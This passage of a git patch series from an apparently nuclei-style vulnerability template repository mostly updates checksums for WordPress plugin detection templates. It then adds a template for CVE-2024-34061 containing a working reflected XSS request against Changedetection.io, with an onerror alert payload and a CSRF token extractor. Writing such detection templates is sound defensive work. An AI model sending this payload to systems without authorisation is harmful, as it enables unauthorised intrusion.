-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:399fcc30d28249a456528c6dfa36476039440b2e +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:46b871016cf8c5ad9f5f8dd833aadbcb7ca8100d +http/technologies/wordpress/plugins/mailpoet.yaml:be7b41e65360a9961f598a6daa5ba837e4729f28 +http/technologies/wordpress/plugins/maintenance.yaml:974abb7a98c6d3c32cde3c462f45921a8d7f2edf +http/technologies/wordpress/plugins/mainwp-child.yaml:6cd01a7fc929c0a4f3d739b23dba2e93716b3a05 +http/technologies/wordpress/plugins/malcare-security.yaml:2c3f0d45a1c0a657f49a1a8e8d227148f965d703 +http/technologies/wordpress/plugins/megamenu.yaml:bcf9b587464cedd970eb27037c273ebc17686a83 +http/technologies/wordpress/plugins/members.yaml:12eb42e1dca63312db380abe2f48026d7bf572b1 +http/technologies/wordpress/plugins/meta-box.yaml:05f5f6836483af8f1c420ea5a5d8727bbdff53a5 +http/technologies/wordpress/plugins/metform.yaml:5b0fc5fcdf855411ec85cef3074b9e4f758fde88 +http/technologies/wordpress/plugins/ml-slider.yaml:d813bfce1eec882a57d333b19f568863c4f8cf93 +http/technologies/wordpress/plugins/newsletter.yaml:dd0672a72fd00cdb8519d913a999e3eb667971bd +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:93ee8ccb31d603571ae0f5bb3d5ea62fea249e27 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:50bdfbb8a5660adfee27d193246f16efdf5fb59f +http/technologies/wordpress/plugins/ninja-forms.yaml:b2d6101709be36b8bc1f68a08ffc03ce820e64da +http/technologies/wordpress/plugins/ocean-extra.yaml:7beb2cd2fcf3ad954cf2195b2af65b013379cf7f +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3e21cded6694cf08b1f7ec4e931113d68e059ee7 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:b66b3777e388e0952ec66499d145c3d6ec27048e +http/technologies/wordpress/plugins/optinmonster.yaml:19c9c2c363d82e810f9236fecdd8939f798a823e +http/technologies/wordpress/plugins/otter-blocks.yaml:ace5248ca160e467910fa039718e58cb494ebee1 +http/technologies/wordpress/plugins/password-protected.yaml:34bd75dff172e20df050909a144c8205bf09487b +http/technologies/wordpress/plugins/pdf-embedder.yaml:1055af6e8fe8b40b01228085cf33f4b357e2e4cf http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:e9a54f7bae3b0aa53cc365d4059c76407b566d58 +http/technologies/wordpress/plugins/pixelyoursite.yaml:2bd76536c2fad12eb089cbf821a9bace47f7c9c2 +http/technologies/wordpress/plugins/polylang.yaml:247116589f3c0d4704534cc1136147ce61a8f2bc http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/popup-maker.yaml:783ad4da46742ab924f841a460c8cabd879f7240 +http/technologies/wordpress/plugins/post-smtp.yaml:610369004795280bbcfb9b2a0d9d1ce94d79fd31 +http/technologies/wordpress/plugins/post-types-order.yaml:5b619e0d4ff29b42578e1a9d6ffc9650aa8560b3 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:c323c9d79f59659ef8f300b960bbc02ff7674aac +http/technologies/wordpress/plugins/pretty-link.yaml:d7a048160478551843fc2787e9d34162e0ef02fd +http/technologies/wordpress/plugins/really-simple-captcha.yaml:9094898f53e07d64200d33967eb529b5bf00d46f +http/technologies/wordpress/plugins/really-simple-ssl.yaml:3d3b3e367da6e9d30a3eb5ac0955e6817a00d206 +http/technologies/wordpress/plugins/redirection.yaml:24bac0bf3fbe611b453c9445d5517be03bfbb5d1 +http/technologies/wordpress/plugins/redux-framework.yaml:86c577c29228a57992cec80463ac1b5491c64c5c +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7d000459f6636248654140cb0af63bdef585f175 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:7886db894516c71f786c8427ba1c2a5b3e092bf3 +http/technologies/wordpress/plugins/safe-svg.yaml:f11746c93254c6baa671686a75e84491c89824d3 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ac3d7c0a24af783eba981c6e3ee8dcbc76d9e4db +http/technologies/wordpress/plugins/sg-cachepress.yaml:e4eee6eba3c34c57acb8d0d743d3a69e27c061ac +http/technologies/wordpress/plugins/sg-security.yaml:5a53692600d72dc512fd82ee896a5de7d968a2de +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:005a49766eb5ad3d064889894d8628375a839309 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a7269348d24aac273bfc50ef252c5014125c8d34 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e291a870f574cb413673f3f7b255e71d99dece79 http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:cb120ee55443666b230261a7714edbd21ed4b09a +http/technologies/wordpress/plugins/siteorigin-panels.yaml:b691280d8e9a80e39cc3948d169656d11256f8fd +http/technologies/wordpress/plugins/smart-slider-3.yaml:d4d3773d13785e2d2bcf56ccd2b5c04d3c895deb +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:8340ca7217c167b392d3fea2b784b3faa6cb5f16 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:ac54099dbb8f7b99b15f26c9d05430808aff524f +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:183d76d12a4f4d4fbef52ee85c9329753d7f5bc3 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:6d4645ee6a289f869eca2d607c050f857f1ce2ac http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:625801ee278d5b31a9b2c75e8044775edc317724 +http/technologies/wordpress/plugins/tablepress.yaml:3467b8de0beb3f29c99126443a07a622d56471e4 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4e58e391914137fda6d60a54cfb3252a33ec79ab +http/technologies/wordpress/plugins/templately.yaml:24bf838e34a3802c6561b67ee612818f8acdfeb2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:9c88c3e928dcbef231f223fce381c2eb960fe198 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:6f886393dc9a1a34fe232b094992071ff7f3c86b +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8feafdabff9d640bf3d42f90669d048cc4fe6181 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:08d466cb68c6a8c55bb9cdc7dce305bef6a7973d +http/technologies/wordpress/plugins/under-construction-page.yaml:4b22b12c9f250674f32dd0a72e5783a35f1ccf50 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:efd09bec4255558660f0201bbb062ab0f5f3080a http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:584a20f6658b845eae296cd3c9caa70660117591 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:bca10686252215d05a5f32be91afafaed55cd66c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4a75d72d5b1e9ae764b513d4cb5eacb8ec79ae9e +http/technologies/wordpress/plugins/webp-express.yaml:04484fc18da7a3097ff8eef04e93712b9d3d238d +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2ba342d8b534d83af412d7c87ac0a510b02fbdb9 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:0240f77a175007bb38fca4fcf6ee72a39605932f +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c0804d5324b6d650908e8c2786da832c3e56c4c5 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:7d8cebc29c3f777de3029c20ec10182e122ec758 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:63ac5e2c0769e54ffcd03e7f942625aa580e432a +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:f84a5a559bb1067053efbb2526e5dbaf1604b9dd +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9fbd2d4d9f2c635b40a10310188b21846e425b60 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:944a2cceb12042fe7c1b6d0d770544bd17a12091 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6296728bd1565b65b62d3ae20518e20058c012a9 +http/technologies/wordpress/plugins/woocommerce-services.yaml:2ea8bda51bfde200195c62161c1aacd25d40837b +http/technologies/wordpress/plugins/woocommerce.yaml:7242b42fa263e14e1f2fb2b28fc1881067975f19 +http/technologies/wordpress/plugins/wordfence.yaml:8cf2555ce8b9a37e92d84618300f567029aa2863 +http/technologies/wordpress/plugins/wordpress-importer.yaml:9f96a19e4a99e07b760838b6087ef1324f3e3dcc +http/technologies/wordpress/plugins/wordpress-seo.yaml:60f16bacb8ef84d6272e1578a4d41fef68089aa9 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:5f7959ab46ba33c65a6d15d8c6d7ed722e8f0c47 +http/technologies/wordpress/plugins/wp-crontrol.yaml:27d8b4c3b7ba741e801464073d5db80854f1c6af +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d5b6cf4bb0171dd1a4278561edaff4d1fd33ef65 +http/technologies/wordpress/plugins/wp-file-manager.yaml:964257f924c84636be6bfe2bdc97dc0d8af8ba00 +http/technologies/wordpress/plugins/wp-google-maps.yaml:17109418f8d19d7d398aaaec3bf63fbd599505a9 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:7615e30bb329bea408856deaacf38e5ed399ff07 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:71a3b39638051ce9ed2b3ded348afb672279de6a +http/technologies/wordpress/plugins/wp-migrate-db.yaml:52b3dd7e622dadd70087e37598adba88535a0f3a +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1c7ceb3fdece714b8a31ab49ebb8342517deb38c +http/technologies/wordpress/plugins/wp-optimize.yaml:24a3c8466e2d7921d5541882691a14cbdcda7512 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a239cbff17766b47120d61a42c8f21ea935b6c3 +http/technologies/wordpress/plugins/wp-reset.yaml:1ac5540102f632ec4c247f8c855c781cbb447e0a +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0be20b24d1d7e0931881718fcfd542e9e2f45e42 +http/technologies/wordpress/plugins/wp-rollback.yaml:60622c0eda0ebf0228f68b0d8823b43679b3c0cf +http/technologies/wordpress/plugins/wp-seopress.yaml:7810a83b8cac808b1ca42ccd80aaad4f38e46b82 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:59fef35e70d9cc53b35b440c0548cd00f4d6df88 +http/technologies/wordpress/plugins/wp-smushit.yaml:fc86ba76c4b29045a1fae0cbbab7742f04b43e07 +http/technologies/wordpress/plugins/wp-statistics.yaml:da19f9f036479a1b0f1edbd6864e7be3e8cca528 +http/technologies/wordpress/plugins/wp-super-cache.yaml:eacbbb4b4c3392b17d8a82cadde144508b2f0642 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e3b567d87072442e91a3dffeeaf8c618357d2fb9 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:8006fd6d5438ead5b7f7ba0cbf372271ffbf29ce +http/technologies/wordpress/plugins/wpforms-lite.yaml:7f0442d51ba37b874f77c06ba41aebe25d4d32ec +http/technologies/wordpress/plugins/wps-hide-login.yaml:552c9ab67ac6df624e78ce908dc5c019073d245a +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d9f4f4f9af65d4f74dc4cc473b21b29fb68706d1 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d23e148ee53bd60e666faffd7b7c2daa658defb1 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8947,7 +8948,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fecee26ddf922dc3ce7a040004bd1d0c6585c416 +templates-checksum.txt:58e12f02e2f66ec3074310e1cc9a626e78570a64 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 53f55dfbf0372e84530ec3fc3f5ba2107521df2b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 07:39:46 +0000 Subject: [PATCH 1796/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 49bc9c58b0..f583462847 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' + - 'http/cves/2023/CVE-2023-5222.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' From dde3a2faf4fe234ed1a14269661844df56ea22d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 07:40:35 +0000 Subject: [PATCH 1797/1841] Auto Template Signing [Thu Aug 1 07:40:35 UTC 2024] :robot: --- http/cves/2023/CVE-2023-5222.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml index 5068ade726..430d2ee6fd 100644 --- a/http/cves/2023/CVE-2023-5222.yaml +++ b/http/cves/2023/CVE-2023-5222.yaml @@ -67,3 +67,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205e4d25f934e60a71c86c0383fc9ea75d3d60a8eab84da76ba0f74a428eebbfb302200b230092cf6e1e982cf44258fe996e03cf7df7774d8e291fea40c94e96f08950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b2a793f398ba3db2b52beeb02a3cdcdfab7a2238 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:07:06 +0530 Subject: [PATCH 1798/1841] Create CVE-2024-34061.yaml --- http/cves/2024/CVE-2024-34061.yaml | 62 ++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34061.yaml diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml new file mode 100644 index 0000000000..8796781bac --- /dev/null +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -0,0 +1,62 @@ +id: CVE-2024-34061 + +info: + name: Changedetection.io <=v0.45.21 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability. + reference: + - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67 + - https://nvd.nist.gov/vuln/detail/CVE-2024-34061 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-34061 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + shodan-query: html:"Change Detection" + tags: cve,cve2024,changedetection,xss + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /settings HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save + + skip-variables-check: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'is not a valid AppRise URL' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: csrf_token + group: 1 + regex: + - 'name="csrf_token" value="([^"]+)"' + internal: true From 053a79c37bc3c8364ee87c4879f7d87b494e7770 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:07:55 +0530 Subject: [PATCH 1799/1841] Create CVE-2024-24763.yaml --- http/cves/2024/CVE-2024-24763.yaml | 46 ++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24763.yaml diff --git a/http/cves/2024/CVE-2024-24763.yaml b/http/cves/2024/CVE-2024-24763.yaml new file mode 